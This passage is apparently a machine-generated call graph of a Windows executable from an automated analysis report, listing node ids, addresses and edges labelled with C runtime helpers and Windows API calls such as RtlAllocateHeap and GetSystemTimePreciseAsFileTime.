shared_ptr 10097->10099 10098 b88ffe shared_ptr __floor_pentium4 10098->9989 10099->10098 10100 bb6c6a RtlAllocateHeap 10099->10100 10101 b8902a 10100->10101 10103 b98248 10102->10103 10104 b98292 10102->10104 10103->10104 10105 b98251 10103->10105 10109 b982a1 10104->10109 10527 b98f40 10104->10527 10522 b99280 10105->10522 10108 b9825a 10108->9991 10109->9991 10123 b97f80 10110->10123 10112 b8596b 10112->10016 10114 b84dc2 10113->10114 10118 b84b92 10113->10118 10114->10019 10115 b84ce5 10115->10114 10117 b98ca0 RtlAllocateHeap 10115->10117 10117->10115 10118->10115 10138 bb6da6 10118->10138 10143 b98ca0 10118->10143 10319 b82280 10120->10319 10126 b97f9e __cftof 10123->10126 10128 b97fc7 10123->10128 10124 b980b3 10125 b99270 RtlAllocateHeap 10124->10125 10127 b980b8 10125->10127 10126->10112 10131 b82480 RtlAllocateHeap 10127->10131 10128->10124 10129 b9801b 10128->10129 10130 b9803e 10128->10130 10129->10127 10133 b9d3e2 RtlAllocateHeap 10129->10133 10134 b9d3e2 RtlAllocateHeap 10130->10134 10136 b9802c __cftof 10130->10136 10132 b980bd 10131->10132 10133->10136 10134->10136 10135 bb6c6a RtlAllocateHeap 10135->10124 10136->10135 10137 b98095 shared_ptr 10136->10137 10137->10112 10139 bb6dc2 10138->10139 10140 bb6db4 10138->10140 10139->10118 10158 bb6d19 10140->10158 10144 b98dc9 10143->10144 10145 b98cc3 10143->10145 10146 b99270 RtlAllocateHeap 10144->10146 10149 b98d2f 10145->10149 10150 b98d05 10145->10150 10147 b98dce 10146->10147 10148 b82480 RtlAllocateHeap 10147->10148 10156 b98d16 __cftof 10148->10156 10152 b9d3e2 RtlAllocateHeap 10149->10152 10149->10156 10150->10147 10151 b98d10 10150->10151 10154 b9d3e2 RtlAllocateHeap 10151->10154 10152->10156 10153 bb6c6a RtlAllocateHeap 10155 b98dd8 10153->10155 10154->10156 10156->10153 10157 b98d8b shared_ptr __cftof 10156->10157 10157->10118 10163 bb690a 10158->10163 10162 bb6d3d 10162->10118 10164 bb692a 10163->10164 10165 bb6921 10163->10165 10164->10165 10177 bba671 10164->10177 10171 bb6d52 10165->10171 10172 bb6d8f 10171->10172 10173 bb6d5f 10171->10173 10299 bbb67d 10172->10299 10176 bb6d6e 10173->10176 10294 bbb6a1 10173->10294 10176->10162 10178 bba67b __dosmaperr 10177->10178 10179 bbd82f __dosmaperr RtlAllocateHeap 10178->10179 10180 bba694 10178->10180 10181 bba6bc __dosmaperr 10179->10181 10182 bb694a 10180->10182 10199 bb8bec 10180->10199 10183 bba6fc 10181->10183 10184 bba6c4 __dosmaperr 10181->10184 10191 bbb5fb 10182->10191 10187 bba49f __dosmaperr RtlAllocateHeap 10183->10187 10188 bbadf5 __freea RtlAllocateHeap 10184->10188 10189 bba707 10187->10189 10188->10180 10190 bbadf5 __freea RtlAllocateHeap 10189->10190 10190->10180 10192 bbb60e 10191->10192 10193 bb6960 10191->10193 10192->10193 10232 bbf5ab 10192->10232 10195 bbb628 10193->10195 10196 bbb63b 10195->10196 10197 bbb650 10195->10197 10196->10197 10245 bbe6b1 10196->10245 10197->10165 10200 bb8bf1 __cftof 10199->10200 10204 bb8bfc ___std_exception_copy 10200->10204 10205 bbd634 10200->10205 10226 bb65ed 10204->10226 10206 bbd640 __dosmaperr 10205->10206 10207 bba7c8 __dosmaperr RtlAllocateHeap 10206->10207 10212 bbd667 __cftof 10206->10212 10214 bbd66d __cftof __dosmaperr 10206->10214 10207->10212 10208 bbd6b2 10210 bb75f6 __dosmaperr RtlAllocateHeap 10208->10210 10209 bbd69c 10209->10204 10211 bbd6b7 10210->10211 10213 bb6c5a ___std_exception_copy RtlAllocateHeap 10211->10213 10212->10208 10212->10209 10212->10214 10213->10209 10215 bbd726 10214->10215 10217 bbd81b __cftof 10214->10217 10223 bbd751 __cftof 10214->10223 10215->10223 10229 bbd62b 10215->10229 10216 bb65ed __cftof 3 API calls 10218 bbd82e 10216->10218 10217->10216 10220 bba671 __cftof 4 API calls 10224 bbd7a5 10220->10224 10222 bbd62b __cftof 4 API calls 10222->10223 10223->10209 10223->10220 10223->10224 10224->10209 10225 bba671 __cftof 4 API calls 10224->10225 10225->10209 10227 bb64c7 __cftof 3 API calls 10226->10227 10228 bb65fe 10227->10228 10230 bba671 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10229->10230 10231 bbd630 10230->10231 10231->10222 10233 bbf5b7 __dosmaperr 10232->10233 10234 bba671 __cftof 4 API calls 10233->10234 10236 bbf5c0 __dosmaperr 10234->10236 10235 bbf606 10235->10193 10236->10235 10241 bbf62c 10236->10241 10238 bbf5ef __cftof 10238->10235 10239 bb8bec __cftof 4 API calls 10238->10239 10240 bbf62b 10239->10240 10242 bbf647 10241->10242 10243 bbf63a __cftof 10241->10243 10242->10238 10243->10242 10244 bbf35f __cftof RtlAllocateHeap 10243->10244 10244->10242 10246 bba671 __cftof 4 API calls 10245->10246 10247 bbe6bb 10246->10247 10250 bbe5c9 10247->10250 10249 bbe6c1 10249->10197 10251 bbe5d5 __dosmaperr 10250->10251 10252 bbe5ef __cftof 10251->10252 10258 bbadf5 __freea RtlAllocateHeap 10251->10258 10253 bb8bec __cftof 4 API calls 10252->10253 10254 bbe5f6 10252->10254 10255 bbe668 10253->10255 10254->10249 10256 bbe6a4 10255->10256 10261 bba72e 10255->10261 10256->10249 10258->10252 10262 bba739 __dosmaperr 10261->10262 10263 bba745 10262->10263 10264 bbd82f __dosmaperr RtlAllocateHeap 10262->10264 10265 bb8bec __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10263->10265 10267 bba7be 10263->10267 10268 bba769 __dosmaperr 10264->10268 10266 bba7c7 10265->10266 10275 bbe4b0 10267->10275 10269 bba7a5 10268->10269 10270 bba771 __dosmaperr 10268->10270 10271 bba49f __dosmaperr RtlAllocateHeap 10269->10271 10272 bbadf5 __freea RtlAllocateHeap 10270->10272 10273 bba7b0 10271->10273 10272->10263 10274 bbadf5 __freea RtlAllocateHeap 10273->10274 10274->10263 10276 bbe5c9 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10275->10276 10277 bbe4c3 10276->10277 10278 bbe259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10277->10278 10279 bbe4cb 10278->10279 10280 bbe4dc 10279->10280 10281 bbb04b __cftof RtlAllocateHeap 10279->10281 10280->10256 10282 bbe4ed 10281->10282 10283 bbe51f 10282->10283 10284 bbe6c4 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10282->10284 10286 bbadf5 __freea RtlAllocateHeap 10283->10286 10285 bbe512 10284->10285 10288 bbe51a 10285->10288 10291 bbe535 __cftof 10285->10291 10287 bbe52d 10286->10287 10287->10256 10289 bb75f6 __dosmaperr RtlAllocateHeap 10288->10289 10289->10283 10290 bbe561 10290->10283 10293 bbe14b __cftof RtlAllocateHeap 10290->10293 10291->10290 10292 bbadf5 __freea RtlAllocateHeap 10291->10292 10292->10290 10293->10283 10295 bb690a __cftof 4 API calls 10294->10295 10296 bbb6be 10295->10296 10298 bbb6ce __floor_pentium4 10296->10298 10304 bbf1bf 10296->10304 10298->10176 10300 bba671 __cftof 4 API calls 10299->10300 10301 bbb688 10300->10301 10302 bbb5fb __cftof 4 API calls 10301->10302 10303 bbb698 10302->10303 10303->10176 10305 bb690a __cftof 4 API calls 10304->10305 10306 bbf1df __cftof 10305->10306 10307 bbf29d __floor_pentium4 10306->10307 10310 bbf232 __cftof 10306->10310 10311 bbb04b 10306->10311 10307->10298 10315 bbf2c2 10310->10315 10313 bbb059 __dosmaperr 10311->10313 10312 bb75f6 __dosmaperr RtlAllocateHeap 10314 bbb087 10312->10314 10313->10312 10313->10314 10314->10310 10316 bbf2ce 10315->10316 10317 bbf2df 10315->10317 10316->10317 10318 bbadf5 __freea RtlAllocateHeap 10316->10318 10317->10307 10318->10317 10320 b82296 10319->10320 10323 bb87f8 10320->10323 10326 bb7609 10323->10326 10325 b822a4 10325->10050 10327 bb7649 10326->10327 10328 bb7631 10326->10328 10327->10328 10330 bb7651 10327->10330 10329 bb75f6 __dosmaperr RtlAllocateHeap 10328->10329 10331 bb7636 10329->10331 10332 bb690a __cftof 4 API calls 10330->10332 10333 bb6c5a ___std_exception_copy RtlAllocateHeap 10331->10333 10334 bb7661 10332->10334 10335 bb7641 __floor_pentium4 10333->10335 10339 bb7bc4 10334->10339 10335->10325 10355 bb868d 10339->10355 10341 bb7be4 10342 bb75f6 __dosmaperr RtlAllocateHeap 10341->10342 10344 bb7be9 10342->10344 10343 bb76e8 10352 bb7a19 10343->10352 10345 bb6c5a ___std_exception_copy RtlAllocateHeap 10344->10345 10345->10343 10346 bb7bd5 10346->10341 10346->10343 10362 bb7d15 10346->10362 10370 bb8168 10346->10370 10375 bb7dc2 10346->10375 10380 bb7de8 10346->10380 10409 bb7f36 10346->10409 10353 bbadf5 __freea RtlAllocateHeap 10352->10353 10354 bb7a29 10353->10354 10354->10335 10356 bb8692 10355->10356 10357 bb86a5 10355->10357 10358 bb75f6 __dosmaperr RtlAllocateHeap 10356->10358 10357->10346 10359 bb8697 10358->10359 10360 bb6c5a ___std_exception_copy RtlAllocateHeap 10359->10360 10361 bb86a2 10360->10361 10361->10346 10431 bb7d34 10362->10431 10364 bb7d1a 10365 bb7d31 10364->10365 10366 bb75f6 __dosmaperr RtlAllocateHeap 10364->10366 10365->10346 10367 bb7d23 10366->10367 10368 bb6c5a ___std_exception_copy RtlAllocateHeap 10367->10368 10369 bb7d2e 10368->10369 10369->10346 10371 bb8178 10370->10371 10372 bb8171 10370->10372 10371->10346 10440 bb7b50 10372->10440 10376 bb7dcb 10375->10376 10377 bb7dd2 10375->10377 10378 bb7b50 4 API calls 10376->10378 10377->10346 10379 bb7dd1 10378->10379 10379->10346 10381 bb7e09 10380->10381 10382 bb7def 10380->10382 10385 bb75f6 __dosmaperr RtlAllocateHeap 10381->10385 10386 bb7e39 10381->10386 10383 bb7fbb 10382->10383 10384 bb7f4f 10382->10384 10382->10386 10389 bb7fc2 10383->10389 10390 bb8001 10383->10390 10399 bb7f92 10383->10399 10395 bb7f5b 10384->10395 10384->10399 10387 bb7e25 10385->10387 10386->10346 10388 bb6c5a ___std_exception_copy RtlAllocateHeap 10387->10388 10392 bb7e30 10388->10392 10393 bb7f69 10389->10393 10394 bb7fc7 10389->10394 10481 bb8604 10390->10481 10392->10346 10407 bb7f77 10393->10407 10408 bb7f8b 10393->10408 10475 bb8241 10393->10475 10394->10399 10400 bb7fcc 10394->10400 10395->10393 10398 bb7fa2 10395->10398 10395->10407 10398->10408 10452 bb8390 10398->10452 10399->10407 10399->10408 10466 bb8420 10399->10466 10401 bb7fdf 10400->10401 10402 bb7fd1 10400->10402 10460 bb8571 10401->10460 10402->10408 10456 bb85e5 10402->10456 10407->10408 10484 bb86ea 10407->10484 10408->10346 10410 bb7fbb 10409->10410 10411 bb7f4f 10409->10411 10412 bb7fc2 10410->10412 10413 bb8001 10410->10413 10420 bb7f92 10410->10420 10411->10420 10421 bb7f5b 10411->10421 10416 bb7f69 10412->10416 10417 bb7fc7 10412->10417 10414 bb8604 RtlAllocateHeap 10413->10414 10415 bb7f77 10414->10415 10419 bb7f8b 10415->10419 10430 bb86ea 4 API calls 10415->10430 10416->10415 10416->10419 10423 bb8241 4 API calls 10416->10423 10417->10420 10424 bb7fcc 10417->10424 10418 bb7fa2 10418->10419 10428 bb8390 4 API calls 10418->10428 10419->10346 10420->10415 10420->10419 10422 bb8420 RtlAllocateHeap 10420->10422 10421->10415 10421->10416 10421->10418 10422->10415 10423->10415 10425 bb7fdf 10424->10425 10426 bb7fd1 10424->10426 10427 bb8571 RtlAllocateHeap 10425->10427 10426->10419 10429 bb85e5 RtlAllocateHeap 10426->10429 10427->10415 10428->10415 10429->10415 10430->10419 10434 bb7d5e 10431->10434 10433 bb7d40 10433->10364 10435 bb7d80 10434->10435 10436 bb75f6 __dosmaperr RtlAllocateHeap 10435->10436 10439 bb7db7 10435->10439 10437 bb7dac 10436->10437 10438 bb6c5a ___std_exception_copy RtlAllocateHeap 10437->10438 10438->10439 10439->10433 10441 bb7b67 10440->10441 10442 bb7b62 10440->10442 10448 bb8ab6 10441->10448 10443 bb75f6 __dosmaperr RtlAllocateHeap 10442->10443 10443->10441 10446 bb75f6 __dosmaperr RtlAllocateHeap 10447 bb7b99 10446->10447 10447->10346 10449 bb8ad1 10448->10449 10450 bb8868 GetPEB ExitProcess GetPEB RtlAllocateHeap 10449->10450 10451 bb7b85 10450->10451 10451->10446 10451->10447 10453 bb83ab 10452->10453 10454 bb83dd 10453->10454 10488 bbc88e 10453->10488 10454->10407 10457 bb85f1 10456->10457 10458 bb8420 RtlAllocateHeap 10457->10458 10459 bb8603 10458->10459 10459->10407 10461 bb8586 10460->10461 10462 bb75f6 __dosmaperr RtlAllocateHeap 10461->10462 10465 bb859a 10461->10465 10463 bb858f 10462->10463 10464 bb6c5a ___std_exception_copy RtlAllocateHeap 10463->10464 10464->10465 10465->10407 10468 bb8433 10466->10468 10467 bb8465 10474 bb845e 10467->10474 10491 bb779f 10467->10491 10468->10467 10469 bb844e 10468->10469 10470 bb75f6 __dosmaperr RtlAllocateHeap 10469->10470 10471 bb8453 10470->10471 10473 bb6c5a ___std_exception_copy RtlAllocateHeap 10471->10473 10473->10474 10474->10407 10476 bb825a 10475->10476 10477 bb779f RtlAllocateHeap 10476->10477 10478 bb8297 10477->10478 10501 bbd3c8 10478->10501 10480 bb830d 10480->10407 10480->10480 10482 bb8420 RtlAllocateHeap 10481->10482 10483 bb861b 10482->10483 10483->10407 10485 bb875d __floor_pentium4 10484->10485 10487 bb8707 10484->10487 10485->10408 10486 bbc88e __cftof 4 API calls 10486->10487 10487->10485 10487->10486 10489 bbc733 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10488->10489 10490 bbc8a6 10489->10490 10490->10454 10492 bb77c3 10491->10492 10493 bb77b4 10491->10493 10495 bb77b9 10492->10495 10496 bbb04b __cftof RtlAllocateHeap 10492->10496 10494 bb75f6 __dosmaperr RtlAllocateHeap 10493->10494 10494->10495 10495->10474 10498 bb77ea 10496->10498 10497 bb7801 10500 bbadf5 __freea RtlAllocateHeap 10497->10500 10498->10497 10499 bb7a33 RtlAllocateHeap 10498->10499 10499->10497 10500->10495 10502 bbd3d8 10501->10502 10503 bbd3ee 10501->10503 10504 bb75f6 __dosmaperr RtlAllocateHeap 10502->10504 10503->10502 10506 bbd400 10503->10506 10505 bbd3dd 10504->10505 10507 bb6c5a ___std_exception_copy RtlAllocateHeap 10505->10507 10509 bbd467 10506->10509 10511 bbd439 10506->10511 10508 bbd3e7 10507->10508 10508->10480 10510 bbd485 10509->10510 10512 bbd48a 10509->10512 10514 bbd4ae 10510->10514 10515 bbd4e4 10510->10515 10516 bbd2ff RtlAllocateHeap 10511->10516 10513 bbcbdf GetPEB ExitProcess GetPEB RtlAllocateHeap 10512->10513 10513->10508 10518 bbd4cc 10514->10518 10519 bbd4b3 10514->10519 10517 bbcef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 10515->10517 10516->10508 10517->10508 10521 bbd0e2 GetPEB ExitProcess GetPEB RtlAllocateHeap 10518->10521 10520 bbd23e GetPEB ExitProcess GetPEB RtlAllocateHeap 10519->10520 10520->10508 10521->10508 10523 b99294 10522->10523 10526 b992a5 __cftof 10523->10526 10548 b994e0 10523->10548 10525 b9932b 10525->10108 10526->10108 10528 b98f6b 10527->10528 10529 b9908e 10527->10529 10533 b98fdc 10528->10533 10534 b98fb2 10528->10534 10530 b99270 RtlAllocateHeap 10529->10530 10531 b99093 10530->10531 10532 b82480 RtlAllocateHeap 10531->10532 10540 b98fc3 __cftof 10532->10540 10538 b9d3e2 RtlAllocateHeap 10533->10538 10533->10540 10534->10531 10535 b98fbd 10534->10535 10537 b9d3e2 RtlAllocateHeap 10535->10537 10536 bb6c6a RtlAllocateHeap 10539 b9909d 10536->10539 10537->10540 10538->10540 10541 b990b8 10539->10541 10543 b990be 10539->10543 10544 b82480 std::_Throw_future_error 10539->10544 10540->10536 10545 b9904c shared_ptr __cftof 10540->10545 10542 b9d3e2 RtlAllocateHeap 10541->10542 10542->10543 10543->10109 10546 bb38af ___std_exception_copy RtlAllocateHeap 10544->10546 10545->10109 10547 b824c3 10546->10547 10547->10109 10549 b99619 10548->10549 10552 b9950b 10548->10552 10550 b99270 RtlAllocateHeap 10549->10550 10551 b9961e 10550->10551 10553 b82480 RtlAllocateHeap 10551->10553 10554 b99579 10552->10554 10555 b99552 10552->10555 10561 b99563 __cftof 10553->10561 10559 b9d3e2 RtlAllocateHeap 10554->10559 10554->10561 10555->10551 10556 b9955d 10555->10556 10558 b9d3e2 RtlAllocateHeap 10556->10558 10557 bb6c6a RtlAllocateHeap 10560 b99628 shared_ptr 10557->10560 10558->10561 10559->10561 10560->10525 10561->10557 10562 b995e1 shared_ptr __cftof 10561->10562 10562->10525 10563 b842b0 10566 b83ac0 10563->10566 10565 b842bb shared_ptr 10567 b83af9 10566->10567 10568 bb6c6a RtlAllocateHeap 10567->10568 10574 b83b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10567->10574 10569 b83be6 10568->10569 10572 b83c38 10569->10572 10587 b832d0 10569->10587 10570 b832d0 6 API calls 10575 b83c5f 10570->10575 10572->10570 10572->10575 10573 b83c68 10573->10565 10574->10565 10575->10573 10606 b83810 10575->10606 10610 b9c6ac 10587->10610 10589 b8336b 10616 b9c26a 10589->10616 10591 b8333c __Mtx_unlock 10593 b9c26a 5 API calls 10591->10593 10596 b83350 __floor_pentium4 10591->10596 10595 b83377 10593->10595 10594 b83314 10594->10589 10594->10591 10613 b9bd4c 10594->10613 10597 b9c6ac GetSystemTimePreciseAsFileTime 10595->10597 10596->10572 10598 b833af 10597->10598 10599 b9c26a 5 API calls 10598->10599 10600 b833b6 __Cnd_broadcast 10598->10600 10599->10600 10601 b9c26a 5 API calls 10600->10601 10602 b833d7 __Mtx_unlock 10600->10602 10601->10602 10603 b9c26a 5 API calls 10602->10603 10604 b833eb 10602->10604 10605 b8340e 10603->10605 10604->10572 10605->10572 10607 b8381c 10606->10607 10696 b82440 10607->10696 10620 b9c452 10610->10620 10612 b9c6b9 10612->10594 10637 b9bb72 10613->10637 10615 b9bd5c 10615->10594 10617 b9c292 10616->10617 10618 b9c274 10616->10618 10617->10617 10618->10617 10643 b9c297 10618->10643 10621 b9c4a8 10620->10621 10623 b9c47a __floor_pentium4 10620->10623 10621->10623 10626 b9cf6b 10621->10626 10623->10612 10624 b9c4fd __Xtime_diff_to_millis2 10624->10623 10625 b9cf6b _xtime_get GetSystemTimePreciseAsFileTime 10624->10625 10625->10624 10627 b9cf7a 10626->10627 10629 b9cf87 __aulldvrm 10626->10629 10627->10629 10630 b9cf44 10627->10630 10629->10624 10633 b9cbea 10630->10633 10634 b9cbfb GetSystemTimePreciseAsFileTime 10633->10634 10635 b9cc07 10633->10635 10634->10635 10635->10629 10638 b9bb9c 10637->10638 10639 b9cf6b _xtime_get GetSystemTimePreciseAsFileTime 10638->10639 10642 b9bba4 __Xtime_diff_to_millis2 __floor_pentium4 10638->10642 10640 b9bbcf __Xtime_diff_to_millis2 10639->10640 10641 b9cf6b _xtime_get GetSystemTimePreciseAsFileTime 10640->10641 10640->10642 10641->10642 10642->10615 10648 b82ae0 10643->10648 10645 b9c2ae 10655 b9c1ff 10645->10655 10647 b9c2bf std::_Throw_future_error 10663 b9bedf 10648->10663 10650 b82af4 __dosmaperr 10650->10645 10651 bba671 __cftof 4 API calls 10650->10651 10654 bb6ccc 10651->10654 10652 bb8bec __cftof 4 API calls 10653 bb6cf6 10652->10653 10654->10652 10656 b9c20b __EH_prolog3_GS 10655->10656 10657 b980c0 RtlAllocateHeap 10656->10657 10658 b9c23d 10657->10658 10670 b826b0 10658->10670 10660 b9c252 10687 b97970 10660->10687 10662 b9c25a 10662->10647 10666 b9cc31 10663->10666 10667 b9cc3f InitOnceExecuteOnce 10666->10667 10669 b9bef2 10666->10669 10667->10669 10669->10650 10671 b97a00 RtlAllocateHeap 10670->10671 10672 b82702 10671->10672 10673 b82725 10672->10673 10674 b98f40 RtlAllocateHeap 10672->10674 10675 b98f40 RtlAllocateHeap 10673->10675 10676 b8278e 10673->10676 10674->10673 10675->10676 10677 b827ed shared_ptr 10676->10677 10679 b828b8 10676->10679 10678 bb38af ___std_exception_copy RtlAllocateHeap 10677->10678 10682 b8284b 10678->10682 10681 bb6c6a RtlAllocateHeap 10679->10681 10680 b8287a shared_ptr __floor_pentium4 10680->10660 10681->10682 10682->10680 10683 bb6c6a RtlAllocateHeap 10682->10683 10684 b828c2 10683->10684 10692 bb3912 10684->10692 10686 b828e5 shared_ptr 10686->10660 10688 b9797b 10687->10688 10689 b97996 shared_ptr 10687->10689 10688->10689 10690 bb6c6a RtlAllocateHeap 10688->10690 10689->10662 10691 b979ba 10690->10691 10693 bb391f 10692->10693 10694 bb3926 10692->10694 10695 bb8ba3 ___std_exception_destroy RtlAllocateHeap 10693->10695 10694->10686 10695->10694 10699 b9b5d6 10696->10699 10698 b82472 10701 b9b5f1 std::_Throw_future_error 10699->10701 10700 bb8bec __cftof 4 API calls 10702 b9b69f 10700->10702 10701->10700 10703 b9b658 __cftof __floor_pentium4 10701->10703 10703->10698 10704 b85cad 10706 b85caf shared_ptr 10704->10706 10705 b85d17 shared_ptr __floor_pentium4 10706->10705 10707 bb6c6a RtlAllocateHeap 10706->10707 10708 b85d47 __cftof 10707->10708 10708->10708 10709 b980c0 RtlAllocateHeap 10708->10709 10711 b85e3e 10709->10711 10710 b85ea6 shared_ptr __floor_pentium4 10711->10710 10712 bb6c6a RtlAllocateHeap 10711->10712 10713 b85ed2 10712->10713 10714 b85ffe shared_ptr __floor_pentium4 10713->10714 10715 bb6c6a RtlAllocateHeap 10713->10715 10716 b8601b 10715->10716 10717 b980c0 RtlAllocateHeap 10716->10717 10718 b86089 10717->10718 10719 b980c0 RtlAllocateHeap 10718->10719 10720 b860bd 10719->10720 10721 b980c0 RtlAllocateHeap 10720->10721 10722 b860ee 10721->10722 10723 b980c0 RtlAllocateHeap 10722->10723 10724 b8611f 10723->10724 10725 b980c0 RtlAllocateHeap 10724->10725 10727 b86150 10725->10727 10726 b865b1 shared_ptr __floor_pentium4 10727->10726 10728 bb6c6a RtlAllocateHeap 10727->10728 10729 b865dc 10728->10729 10730 b97a00 RtlAllocateHeap 10729->10730 10731 b866a6 10730->10731 10732 b85c10 4 API calls 10731->10732 10733 b866ac 10732->10733 10734 b85c10 4 API calls 10733->10734 10735 b866b1 10734->10735 10736 b822c0 4 API calls 10735->10736 10737 b866c9 shared_ptr 10736->10737 10738 b97a00 RtlAllocateHeap 10737->10738 10739 b86732 10738->10739 10740 b85c10 4 API calls 10739->10740 10741 b8673d 10740->10741 10742 b822c0 4 API calls 10741->10742 10747 b86757 shared_ptr 10742->10747 10743 b86852 10744 b980c0 RtlAllocateHeap 10743->10744 10746 b8689c 10744->10746 10745 b97a00 RtlAllocateHeap 10745->10747 10748 b980c0 RtlAllocateHeap 10746->10748 10747->10743 10747->10745 10749 b85c10 4 API calls 10747->10749 10751 b822c0 4 API calls 10747->10751 10750 b868e3 shared_ptr __floor_pentium4 10748->10750 10749->10747 10751->10747 10752 b818a0 10753 b980c0 RtlAllocateHeap 10752->10753 10754 b818b1 10753->10754 10757 b9d64e 10754->10757 10760 b9d621 10757->10760 10761 b9d630 10760->10761 10762 b9d637 10760->10762 10766 bb988e 10761->10766 10769 bb98fa 10762->10769 10765 b818bb 10767 bb98fa RtlAllocateHeap 10766->10767 10768 bb98a0 10767->10768 10768->10765 10772 bb9630 10769->10772 10771 bb992b 10771->10765 10773 bb963c __dosmaperr 10772->10773 10776 bb968b 10773->10776 10775 bb9657 10775->10771 10777 bb96a7 10776->10777 10785 bb971e __dosmaperr 10776->10785 10784 bb96fe 10777->10784 10777->10785 10786 bbedf6 10777->10786 10779 bbedf6 RtlAllocateHeap 10781 bb9714 10779->10781 10780 bb96f4 10782 bbadf5 __freea RtlAllocateHeap 10780->10782 10783 bbadf5 __freea RtlAllocateHeap 10781->10783 10782->10784 10783->10785 10784->10779 10784->10785 10785->10775 10785->10785 10787 bbee1e 10786->10787 10788 bbee03 10786->10788 10790 bbee2d 10787->10790 10795 bc4fdc 10787->10795 10788->10787 10789 bbee0f 10788->10789 10791 bb75f6 __dosmaperr RtlAllocateHeap 10789->10791 10802 bc500f 10790->10802 10794 bbee14 __cftof 10791->10794 10794->10780 10796 bc4ffc 10795->10796 10797 bc4fe7 10795->10797 10796->10790 10798 bb75f6 __dosmaperr RtlAllocateHeap 10797->10798 10799 bc4fec 10798->10799 10800 bb6c5a ___std_exception_copy RtlAllocateHeap 10799->10800 10801 bc4ff7 10800->10801 10801->10790 10803 bc501c 10802->10803 10804 bc5027 10802->10804 10806 bbb04b __cftof RtlAllocateHeap 10803->10806 10805 bc502f 10804->10805 10810 bc5038 __dosmaperr 10804->10810 10807 bbadf5 __freea RtlAllocateHeap 10805->10807 10809 bc5024 10806->10809 10807->10809 10808 bb75f6 __dosmaperr RtlAllocateHeap 10808->10809 10809->10794 10810->10808 10810->10809 10816 b820a0 10821 b9c68b 10816->10821 10819 b9d64e RtlAllocateHeap 10820 b820b6 10819->10820 10824 b9c3d5 10821->10824 10823 b820ac 10823->10819 10825 b9c3e1 10824->10825 10826 b9c3eb 10824->10826 10827 b9c3be 10825->10827 10828 b9c39e 10825->10828 10826->10823 10837 b9cd0a 10827->10837 10828->10826 10833 b9ccd5 10828->10833 10831 b9c3d0 10831->10823 10834 b9cce3 InitializeCriticalSectionEx 10833->10834 10836 b9c3b7 10833->10836 10834->10836 10836->10823 10838 b9cd1f RtlInitializeConditionVariable 10837->10838 10838->10831 10869 b834a0 10870 b834aa 10869->10870 10871 b834ca shared_ptr 10869->10871 10870->10871 10872 bb6c6a RtlAllocateHeap 10870->10872 10873 b834f2 10872->10873 10874 b83537 shared_ptr 10873->10874 10877 b9c17c 10873->10877 10878 b9c18a Concurrency::cancel_current_task std::_Throw_future_error 10877->10878 10881 b9c0e9 10878->10881 10880 b9c1aa std::_Throw_future_error 10882 b822e0 std::invalid_argument::invalid_argument RtlAllocateHeap 10881->10882 10883 b9c0fb 10882->10883 10883->10880 10884 b85a9e 10886 b85a61 10884->10886 10885 b980c0 RtlAllocateHeap 10885->10886 10886->10884 10886->10885 10888 b97a00 RtlAllocateHeap 10886->10888 10889 b85bdd __floor_pentium4 10886->10889 10890 b85730 10886->10890 10888->10886 10894 b85860 shared_ptr 10890->10894 10898 b85799 shared_ptr 10890->10898 10891 b8592a 10899 b98200 10891->10899 10892 b980c0 RtlAllocateHeap 10892->10898 10895 b85900 shared_ptr __floor_pentium4 10894->10895 10896 bb6c6a RtlAllocateHeap 10894->10896 10895->10886 10897 b85934 10896->10897 10898->10891 10898->10892 10898->10894 10902 b9c1d9 10899->10902 10901 b9820a 10905 b9c15d 10902->10905 10904 b9c1ea std::_Throw_future_error 10904->10901 10906 b822e0 std::invalid_argument::invalid_argument RtlAllocateHeap 10905->10906 10907 b9c16f 10906->10907 10907->10904 10915 b83c8e 10916 b83c98 10915->10916 10921 b83cb4 10916->10921 10934 b82410 10916->10934 10919 b83810 4 API calls 10922 b83ccf 10919->10922 10921->10919 10923 b83810 4 API calls 10922->10923 10924 b83cdb 10923->10924 10927 b83d52 10924->10927 10949 b97d50 10924->10949 10926 b9d3e2 RtlAllocateHeap 10928 b83d84 10926->10928 10927->10926 10929 b97d50 RtlAllocateHeap 10928->10929 10931 b83e03 10928->10931 10929->10931 10930 b83e9b shared_ptr 10931->10930 10932 bb6c6a RtlAllocateHeap 10931->10932 10933 b83ec1 10932->10933 10935 b82424 10934->10935 10981 b9b52d 10935->10981 10938 b83ce0 10939 b83d42 10938->10939 10942 b83d52 10938->10942 10940 b97d50 RtlAllocateHeap 10939->10940 10940->10942 10941 b9d3e2 RtlAllocateHeap 10943 b83d84 10941->10943 10942->10941 10944 b97d50 RtlAllocateHeap 10943->10944 10946 b83e03 10943->10946 10944->10946 10945 b83e9b shared_ptr 10945->10921 10946->10945 10947 bb6c6a RtlAllocateHeap 10946->10947 10948 b83ec1 10947->10948 10950 b97dcb 10949->10950 10951 b97d62 10949->10951 10952 b82480 RtlAllocateHeap 10950->10952 10953 b97d6d 10951->10953 10954 b97d9c 10951->10954 10956 b97d7a 10952->10956 10953->10950 10957 b97d74 10953->10957 10955 b97db9 10954->10955 10958 b9d3e2 RtlAllocateHeap 10954->10958 10955->10927 10959 bb6c6a RtlAllocateHeap 10956->10959 10962 b97d83 10956->10962 10960 b9d3e2 RtlAllocateHeap 10957->10960 10961 b97da6 10958->10961 10968 b97dd5 10959->10968 10960->10956 10961->10927 10962->10927 10963 b97f20 10964 b99270 RtlAllocateHeap 10963->10964 10977 b97e91 __cftof 10964->10977 10965 b97e01 10965->10927 10966 bb6c6a RtlAllocateHeap 10975 b97f2a __cftof 10966->10975 10967 b97f1b 10971 b82480 RtlAllocateHeap 10967->10971 10968->10963 10968->10965 10968->10967 10969 b97e80 10968->10969 10970 b97ea7 10968->10970 10969->10967 10972 b97e8b 10969->10972 10974 b9d3e2 RtlAllocateHeap 10970->10974 10970->10977 10971->10963 10973 b9d3e2 RtlAllocateHeap 10972->10973 10973->10977 10974->10977 10976 b97f61 shared_ptr 10975->10976 10978 bb6c6a RtlAllocateHeap 10975->10978 10976->10927 10977->10966 10980 b97f02 shared_ptr 10977->10980 10979 b97f7c 10978->10979 10980->10927 10989 bb3aed 10981->10989 10983 b9b5a5 ___std_exception_copy 10996 b9b1ad 